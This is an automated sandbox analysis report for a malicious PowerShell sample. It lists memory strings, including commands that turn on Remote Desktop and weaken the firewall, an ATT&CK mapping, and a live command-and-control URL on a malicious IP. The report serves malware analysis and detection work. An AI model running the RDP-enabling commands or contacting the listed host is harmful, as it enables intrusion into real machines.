YeSdyFLxqGyUXOtk5M0b=LSKw4OCmSBUoUWaVOwKEQzNWdhNlcsVIg03QabZvU2RUXzCx5fGp5Xx8WQ9peLZp0kjaXLZfQ05IVAyRMxmNLPRAUVA=UWaVOwKEQzNqchVyc7BY4VOmKsvfU2RsdhalSPC4JhFubQREb2RBgEDVVuPsZGRpVhamSOYAKv==XypyFvp=RBKoRPKj7ANgeBVpcrhEQjfIXMDybHRUaRYwRBKoRPKj7ANgeBVpcrhEQjjIXMDybHRUaRYwUVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYBiMdG4JYVtdgZueK3qhlLf RU=UCyxSzKa7z5ccQY=MepzHI==MepAF9==MepzG9==MepAGI==QYKA6eKl7zJWbQBkXv==Oed8ciKwSymjFuIp0RllLXhiIiGj6Uii4RxnJwcmJHcugQy9IdpoCaqR4R1gcXZ0JIIlOgW7XvLvIA==JdNiKP7g7xI=IdpoCaqpSR4bIxNoBs==UBY5SPyq4BVncw9lfLY=LRK6SOCS7BlqchFvcLpojQzoXLRydGRtaR3wSOF8EPZkcAYgJl==Ib==cX737yGm7X4bMRQgM2UlRy==cYFa6o==chuwSyYkSXK7ReY96hQbUAJ5c8Z52DzoXLnyYWM=MypyFvpRFOk=MypyFvpRFeI=MypyFvpRFeM=MypyFvpRFXY=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
                Source: RegSvcs.exeString found in binary or memory: net start termservice
                Source: RegSvcs.exe, 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: net start termservice
                Source: RegSvcs.exe, 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta60c430246a6b5eabfeff991901daa754340bbf41c5952b1373dfe1ff8834fec26467e7e9fc62574ce418d4877910b7601ae5eMO24EbtoFt4sNNYuNYQCLu7I7fJS4hgVSANTM7pz4ETUJcrrcA==NNTzFs==UtPn5zJkJNQu7I==LNKu7I==YRGoFvFVGRNcOa==RY727PKkEhVZ0K==UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033ScLxT21dZL==UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033PM8zbG5sZSyeOPCc6dBObAZscHFLg0vaXMzCUYGj6fGS6v==UhKvYXQmBuYuBAJISypSJHcEQ1C7UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033ScLxciKwSymjFuIbUCyxSVy95SM=UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033PM8zbG5sZSyeNU7c5BwbSgcs0LZDhu==JQKVKNyHNf9BTOBFKV==Xzuy6s==UzYVOs==RVKWaRF8diB8cXF8bYB8Yh 8YSx8cBB8dRT8ZBP8YSN8bCN8bX28ceP=YYynSuUb5Bx3ZWBpdH9pgEvYYYynSuUb5Bw=YXmr6uUb5Bw=Zyt=ZOt=ZOx=ZOB=TRur59==aCG26vdmEr==aCG26zBXEt8=ZS7nZBmuYXQmcCBzbSCrehayLYu34OKRPBB+PBF+LWqu7O3g5iMqKthtIr==fv==JiKw4PF0PL==cX7n5ylqFd5fcAA=aXKA5eKjFuIp0ABsRXK2MeuR4SZgVXpzeLZyXU3c l==UCyxSVy95PRceAJcQQODNTF8NX9heBhhdrY=QSOr6et=SXuB6yKp6Xt0JyBhZl==RQCHOs==UBuwSyt8NXVeeRNpeMo=RBYl7yYpBAdgZa==QQOJMuNyOyYRRRxO0QR1drp5jO==Qha2SyKdSR5f0RM=ThYA7yYlUXYy4yYqQXYv5UGmVXawKyKdSR5f0RM=MytAFrFSGecZPK==chx=dXx=QXYw7yKl7x1PfRFlPnFyiUvQ9MrkcnMpZhYA5KQbRSRcPsFic8Zz4EDocIQwLSWnLNPvEKPkDLeF5UURSR5VMOVpd8FAh0jQ9LZxOixgbYyvEOG97BE2JA9hc1YdNkP8bvulOyxgaRmn5eukSO0dIbPMJUYl7BVpew5Uf2FqTgz8awrvaWJbdBax5aYmRYRgew5zeMNq3UYDA6QNDLdvEKPkEN0=LNPPv9==PYCl6bPoLheySo==QXYw7yKl7x1PfRFlPnFmhFzi9LDkdGhpbdY6EP3U7t1hcXNtM2ZDgETkWRZnZWM=UWaVOwKEQzNWdhNlcsVIg03QabZvU2RUXzCx5fGp5Xx8RWctdMZ54VHEWLRoXEJpbSq37yKpMhFo0K==QXYv6zKRSSJJZQ5lYRylSyKdSXhkbgxsc19AhFDoaSH4dn YeSdyFLxqGyUXOtk5M0b=LSKw4OCmSBUoUWaVOwKEQzNWdhNlcsVIg03QabZvU2RUXzCx5fGp5Xx8WQ9peLZp0kjaXLZfQ05IVAyRMxmNLPRAUVA=UWaVOwKEQzNqchVyc7BY4VOmKsvfU2RsdhalSPC4JhFubQREb2RBgEDVVuPsZGRpVhamSOYAKv==XypyFvp=RBKoRPKj7ANgeBVpcrhEQjfIXMDybHRUaRYwRBKoRPKj7ANgeBVpcrhEQjjIXMDybHRUaRYwUVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYBiMdG4JYVtdgZueK3qhlLf RU=UCyxSzKa7z5ccQY=MepzHI==MepAF9==MepzG9==MepAGI==QYKA6eKl7zJWbQBkXv==Oed8ciKwSymjFuIp0RllLXhiIiGj6Uii4RxnJwcmJHcugQy9IdpoCaqR4R1gcXZ0JIIlOgW7XvLvIA==JdNiKP7g7xI=IdpoCaqpSR4bIxNoBs==UBY5SPyq4BVncw9lfLY=LRK6SOCS7BlqchFvcLpojQzoXLRydGRtaR3wSOF8EPZkcAYgJl==Ib==cX737yGm7X4bMRQgM2UlRy==cYFa6o==chuwSyYkSXK7ReY96hQbUAJ5c8Z52DzoXLnyYWM=MypyFvpRFOk=MypyFvpRFeI=MypyFvpRFeM=MypyFvpRFXY=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		311
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		1
                Remote Desktop Protocol                		1
                Screen Capture                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		131
                Virtualization/Sandbox Evasion                		LSASS Memory141
                Security Software Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)311
                Process Injection                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin Shares1
                Clipboard Data                		1
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Deobfuscate/Decode Files or Information                		NTDS131
                Virtualization/Sandbox Evasion                		Distributed Component Object ModelInput Capture11
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                Obfuscated Files or Information                		LSA Secrets1
                Application Window Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials1
                Account Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                System Owner/User Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                System Network Configuration Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow2
                File and Directory Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing44
                System Information Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                nYT1CaXH9N.ps18%VirustotalBrowse
                nYT1CaXH9N.ps124%ReversingLabsWin32.Trojan.Generic

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://176.113.115.131/8Fvu5jh4DbS/index.phpl0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.phpW-;0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.phpd0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.php0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.phpXNtM2ZDgETkWRZnZWM=0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.phpb0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.phpn-0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.php-0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.phpmmon0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.phpj0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.phped/0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.phpZ-0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.phpK0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.phped0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.phpV0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.php)-0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.phpx0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.phpE0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.phpedY0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.phpdK0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.php00%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.phpw0%Avira URL Cloudsafe
                http://176.113.115.131/8Fvu5jh4DbS/index.phpq0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://176.113.115.131/8Fvu5jh4DbS/index.phptrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://176.113.115.131/8Fvu5jh4DbS/index.php-RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://176.113.115.131/8Fvu5jh4DbS/index.phplRegSvcs.exe, 00000003.00000002.4127608803.0000000001473000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1864550591.00000296DC2DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.1840009085.00000296CD403000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://176.113.115.131/8Fvu5jh4DbS/index.phpjRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1840009085.00000296CD63F000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://176.113.115.131/8Fvu5jh4DbS/index.phpdRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1840009085.00000296CD63F000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://go.micropowershell.exe, 00000000.00000002.1840009085.00000296CCC64000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://176.113.115.131/8Fvu5jh4DbS/index.phpW-;RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://176.113.115.131/8Fvu5jh4DbS/index.phpn-RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://176.113.115.131/8Fvu5jh4DbS/index.phpXNtM2ZDgETkWRZnZWM=RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contoso.com/Licensepowershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://176.113.115.131/8Fvu5jh4DbS/index.phpbRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://upx.sf.netAmcache.hve.0.drfalse
                                		high
                                http://176.113.115.131/8Fvu5jh4DbS/index.phpmmonRegSvcs.exe, 00000003.00000002.4127608803.0000000001407000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://176.113.115.131/8Fvu5jh4DbS/index.phpVRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1840009085.00000296CD63F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://176.113.115.131/8Fvu5jh4DbS/index.phped/RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://176.113.115.131/8Fvu5jh4DbS/index.phpKRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://176.113.115.131/8Fvu5jh4DbS/index.phpJRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://176.113.115.131/8Fvu5jh4DbS/index.phpZ-RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://176.113.115.131/8Fvu5jh4DbS/index.phpERegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://176.113.115.131/8Fvu5jh4DbS/index.phpDRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://176.113.115.131/8Fvu5jh4DbS/index.phpedRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://contoso.com/powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1864550591.00000296DC2DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://oneget.orgXpowershell.exe, 00000000.00000002.1840009085.00000296CD403000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://176.113.115.131/8Fvu5jh4DbS/index.php)-RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://176.113.115.131/8Fvu5jh4DbS/index.phpdKRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://176.113.115.131/8Fvu5jh4DbS/index.phpedYRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://176.113.115.131/8Fvu5jh4DbS/index.phpxRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://aka.ms/pscore68powershell.exe, 00000000.00000002.1840009085.00000296CBA71000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1840009085.00000296CBA71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://176.113.115.131/8Fvu5jh4DbS/index.phpwRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://176.113.115.131/8Fvu5jh4DbS/index.phpqRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://oneget.orgpowershell.exe, 00000000.00000002.1840009085.00000296CD403000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://176.113.115.131/8Fvu5jh4DbS/index.php0RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  176.113.115.131
                                                  		unknownRussian Federation
                                                  		49505SELECTELRUtrue

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1585766
                                                  Start date and time:2025-01-08 08:41:06 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 7m 25s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:10
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:nYT1CaXH9N.ps1
                                                  renamed because original name is a hash value
                                                  Original Sample Name:ab733235a722c734fb8f19160825cef1.ps1
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winPS1@8/10@0/1
                                                  EGA Information:
                                                  • Successful, ratio: 50%
                                                  HCA Information:
                                                  • Successful, ratio: 86%
                                                  • Number of executed functions: 26
                                                  • Number of non-executed functions: 96
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .ps1
                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 52.182.143.212, 20.190.159.64, 4.245.163.56, 13.107.253.45
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target powershell.exe, PID 6544 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  02:41:57API Interceptor41x Sleep call for process: powershell.exe modified
                                                  02:41:58API Interceptor11890654x Sleep call for process: RegSvcs.exe modified
                                                  02:42:13API Interceptor1x Sleep call for process: wermgr.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  SELECTELRUiy2.dat.exeGet hashmaliciousXWormBrowse
                                                  • 176.113.115.170
                                                  z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                  • 82.148.27.5
                                                  K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                  • 176.113.115.19
                                                  IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                  • 176.113.115.19
                                                  J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                  • 176.113.115.19
                                                  176.113.115_1.170.ps1Get hashmaliciousXWormBrowse
                                                  • 176.113.115.170
                                                  botx.sh4.elfGet hashmaliciousMiraiBrowse
                                                  • 178.132.202.249
                                                  TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                  • 176.113.115.19
                                                  sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                  • 176.113.115.19
                                                  https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpegGet hashmaliciousHTMLPhisherBrowse
                                                  • 82.202.242.100

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_cff3fccfaef89fe97e70f334411924bd667e9abb_00000000_15fea88f-d6f7-40fb-bddb-be4befca8ab2\Report.wer

                                                  Download File
                                                  Process:C:\Windows\System32\wermgr.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):0.531657160926199
                                                  Encrypted:false
                                                  SSDEEP:96:zyFMjfVrxYidNRH3Uje0e35/3ooLF1QXIGZAX/d5FMT2SlPkpXmTAqUf/VXT5NHn:2A9mGNR30m8AzuiFckZ24lO8
                                                  MD5:4F50282A28993C1E65E5539AB1F7C3EA
                                                  SHA1:269854EF0F7C7BAFD5932BFD508E218355966CCE
                                                  SHA-256:94CBE5C3E3F402C4B0B9375CC5C8263590166281C99AD42A44F1D1FC3CEDE774
                                                  SHA-512:1A513F0BAB39A7627EF5CE64C62F5D467C27884D05138C753092CAD5955C6AD08F74B3E271D437F51A3825D9D8DACFA727D38EF801B0FD9075CB9ED062069BDF
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.7.9.5.7.6.6.0.6.6.1.4.5.5.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.7.9.5.7.1.9.0.1.8.1.9.2.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.f.e.a.8.8.f.-.d.6.f.7.-.4.0.f.b.-.b.d.d.b.-.b.e.4.b.e.f.c.a.8.a.b.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.9.0.-.0.0.0.1.-.0.0.1.4.-.f.8.a.e.-.8.8.c.a.a.0.6.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DB1.tmp.WERInternalMetadata.xml

                                                  Download File
                                                  Process:C:\Windows\System32\wermgr.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):7288
                                                  Entropy (8bit):3.732108584879017
                                                  Encrypted:false
                                                  SSDEEP:96:RSIU6o7wVetbrEQAIBi6YR7/KVRtjcvZgmfHNpX6PrFE5aMibm:R6l7wVeJrEgBi6Y9yVRtOgmftY+pibm
                                                  MD5:EE49955FEB8EABACE9450D2BD0B011C9
                                                  SHA1:04F3D999DB2A6E949C652EC07B4198407BB66CE3
                                                  SHA-256:9142E6097758DBB8A05048968C3F70E9206D34B7A8C8D64BD89F25AFC35F3569
                                                  SHA-512:BF80E46F4CA589D7DFEE8782ABC1841C25742D32BBAE78C041349C8CC20EBC4C97032FA7A3639C1EB30D62686E208666E76474AB4DE873C42D7C9C7D7A88E436
                                                  Malicious:false
                                                  Reputation:low
